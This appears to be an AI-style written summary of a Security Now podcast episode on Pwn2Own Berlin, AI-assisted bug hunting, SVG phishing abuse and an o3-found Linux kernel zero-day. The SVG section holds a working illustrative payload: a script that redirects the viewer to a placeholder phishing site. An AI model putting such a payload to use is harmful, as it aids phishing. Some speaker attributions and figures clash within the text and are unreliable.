Podcast Summary: Security Now 1028: AI Vulnerability Hunting
Podcast Information:
- Title: Security Now 1028: AI Vulnerability Hunting
- Host/Author: TWiT (Leo Laporte and Steve Gibson)
- Release Date: June 4, 2025
1. Introduction
In this episode of Security Now, hosts Leo Laporte and Steve Gibson delve into the evolving landscape of cybersecurity, focusing on the intersection of artificial intelligence (AI) and vulnerability hunting. The discussion promises insights into the latest hacking competitions, AI-driven security threats, and significant advancements in exploit detection.
2. Pwn2Own Berlin 2025 Hacking Competition Results
The episode kicks off with an overview of the Pwn2Own 2025 hacking competition held in Berlin, marking the event's first occurrence outside Vancouver. Organized by Trend Micro's Zero Day Initiative, the competition attracted some of the world's best vulnerability researchers.
- Steve Gibson [01:19]: "The show where we cover your privacy, your security, how computers work..."
- Leo Laporte [04:16]: "So, yeah, if the good guys can discover vulnerabilities with AI, so can the bad guys."
Key Highlights:
- Star Labs SG Combined Team emerged as the top performers, securing $320,000 and 35 Master of Pwn points by exploiting VMware's ESXi.
- Summoning Team and FPT Nightwolf also showcased impressive exploits against Nvidia's Triton Inference Server.
- A total of 28 unique zero-day vulnerabilities were disclosed to respective vendors, with some remaining unpatched, notably by Nvidia.
Notable Quote:
- Leo Laporte [29:34]: "They wrote, 'Congratulations to the STAR Labs SG team for winning Master of Pwn. They took home $320,000 and 35 Master of Pwn points during the event.'"
Conclusion: The competition underscored the persistent vulnerabilities in modern, fully patched systems, emphasizing the ongoing cat-and-mouse game between hackers and security professionals.
3. AI Vulnerability Hunting: A Double-Edged Sword
The conversation transitions to the role of AI in cybersecurity, highlighting both its potential for enhancing defensive measures and its risk of empowering malicious actors.
- Steve Gibson [04:55]: "Well, if the good guys can discover vulnerabilities with AI, so can the bad guys."
- Leo Laporte [05:02]: "I do make the point that if the AI is used before the release of the software, then there won't be vulnerabilities for the bad guys to find."
Discussion Points:
- Proactive Security: Utilizing AI models like Claude Code to write tests and identify vulnerabilities before software release.
- Balancing Act: The symmetry between defensive and offensive uses of AI in vulnerability discovery.
Notable Quote:
- Leo Laporte [05:29]: "I've been using Claude Code and AI to write tests, which I think is a really good use of AI to provide an independent eye looking at your code."
4. Listener Feedback and Insights
The hosts engage with feedback from listeners, addressing complex topics such as Encrypted Client Hello (ECH) in enterprise environments and the challenges of AI-assisted code review.
Listener Contributions:
- Kevin (Cloud Security Engineer): Discusses the necessity of blocking Encrypted Client Hello (ECH) in corporate settings to maintain traffic inspection capabilities.
- Aaron Morgan (Microsoft Software Engineering Manager): Shares experiences with Microsoft's Copilot, emphasizing the importance of precise prompting to mitigate subpar AI-generated code.
- Andrew Mitchell (Voipster Communications, Inc.): Requests support for the Linux Dictation Project, aimed at enhancing voice control systems for accessibility.
Notable Quotes:
- Leo Laporte [112:11]: "Otherwise, we have to man-in-the-middle ourselves to decrypt and re-encrypt all that traffic..."
- Aaron Morgan [117:01]: "I'm pleased to hear he's one of the go-to reviewers, and as an experienced dev he's asking the AI the right questions, because, as Steve too did, he may receive a first reply which indicates an insufficiently deep approach to the problem..."
5. The SVG Security Threat
A significant portion of the episode is dedicated to discussing the rising abuse of Scalable Vector Graphics (SVG) files in phishing attacks. SVGs' ability to embed JavaScript makes them potent tools for cybercriminals.
Key Points:
- Cloudflare's Analysis: Reports a 245% increase in SVG files used to obfuscate phishing payloads.
- Attack Vectors: SVGs used for redirects, self-contained phishing pages, and DOM manipulation to execute malicious scripts.
- Security Recommendations: Implementing stricter controls on SVG scripting within email clients and browsers to mitigate these threats.
Notable Quote:
- Leo Laporte [86:52]: "What idiot decided that allowing JavaScript to run inside a simple two-dimensional vector-based image format would be a good idea?"
Conclusion: The inherent scripting capabilities within SVGs, combined with their widespread support, present a significant security challenge that demands immediate attention from developers and security professionals alike.
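The scripting capability the hosts object to is easy to demonstrate. Below is a minimal, purely illustrative SVG (the URL is a placeholder, not from any real campaign) showing how a `<script>` element inside what looks like an ordinary image can redirect a victim who opens the file directly:

```xml
<!-- Illustrative only: an SVG that displays as an image but runs
     JavaScript when opened as a top-level document. -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <text x="10" y="50">Invoice_2025.pdf</text>
  <script type="text/javascript">
    // Executes when the SVG is opened directly in a browser;
    // browsers disable SVG scripting inside &lt;img&gt; tags and CSS.
    window.location = "https://phishing-site.example/login";
  </script>
</svg>
```

Note that browsers do not execute scripts when an SVG is embedded via an `<img>` tag or CSS background, which is why these attacks rely on the recipient opening the attachment as a standalone document.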
6. Classic Sci-Fi Movies and AI
In a lighter segment, the hosts reminisce about classic science fiction films that mirror today's AI advancements and societal concerns.
Featured Movies:
- "Colossus: The Forbin Project" (1970): Explores themes of AI autonomy and control.
- Other Classics: Mention of "Forbidden Planet" and "The Day the Earth Stood Still," highlighting their enduring relevance.
Notable Quote:
- Leo Laporte [129:12]: "It's 70 years ago, absolutely a classic still relevant today."
Conclusion: These films serve as cultural touchstones, reflecting contemporary anxieties and aspirations regarding AI and technological supremacy.
7. Deep Dive: AI Discovers a Zero-Day in the Linux Kernel
The episode culminates with an in-depth analysis of how OpenAI's o3 model was employed to uncover a previously unknown zero-day vulnerability in ksmbd, the Linux kernel's in-kernel SMB server.
Key Highlights:
- Sean Heelan's Experiment:
  - Utilized the o3 model to analyze approximately 12,000 lines of Linux kernel code.
  - Discovered a use-after-free (UAF) vulnerability, designated CVE-2025-37899.
- Vulnerability Details:
  - Occurs in the Kerberos authentication path, allowing remote attackers to execute arbitrary code.
  - The exploit involves concurrent thread operations leading to memory corruption.
- Performance Metrics:
  - o3: Detected the known vulnerability in 1 out of 100 runs and identified the novel vulnerability in 1 additional run.
  - Claude Sonnet 3.7: Detected the vulnerability in 3 out of 100 runs.
  - Claude Sonnet 3.5: Did not detect the vulnerability.
Notable Quotes:
- Sean Heelan [141:40]: "LLMs have made a leap forward in their ability to reason about code. If you have a problem that can be represented in fewer than 10,000 lines of code, there is a reasonable chance o3 can either solve it or help you solve it."
- Steve Gibson [180:46]: "This is fantastic. Love it."
Technical Explanation: The hosts provide a comprehensive explanation of use-after-free vulnerabilities, emphasizing their severity and the sophistication required to exploit them effectively. Sean's successful use of the O3 model demonstrates AI's growing capability in aiding vulnerability research, though challenges such as false positives remain.
Conclusion: AI models like O3 are emerging as powerful tools in the cybersecurity arsenal, capable of identifying critical vulnerabilities that were previously the domain of expert human researchers. This advancement signifies a transformative shift in how security professionals approach vulnerability discovery and mitigation.
8. Closing Remarks and Community Engagement
In the final segments, the hosts encourage listener participation, promote community forums, and acknowledge sponsors who support the show's mission to inform and protect the cybersecurity community.
Call to Action:
- Support Projects: Encouraging listeners to support initiatives like the Linux Dictation Project aimed at enhancing accessibility.
- Engage with the Community: Invitation to join forums, subscribe to newsletters, and participate in discussions to stay updated on the latest security trends.
Notable Quote:
- Steve Gibson [125:52]: "Guys, let's take a break and then we're going to talk about the unbelievable design of scalable vector graphics."
Conclusion
Security Now 1028: AI Vulnerability Hunting offers a compelling exploration of the synergistic potential and inherent risks of integrating AI into cybersecurity practices. From competitive hacking events to groundbreaking AI-driven vulnerability discoveries, the episode underscores the dynamic and ever-evolving nature of digital security. The hosts adeptly balance technical depth with accessible explanations, providing valuable insights for both seasoned professionals and curious enthusiasts alike.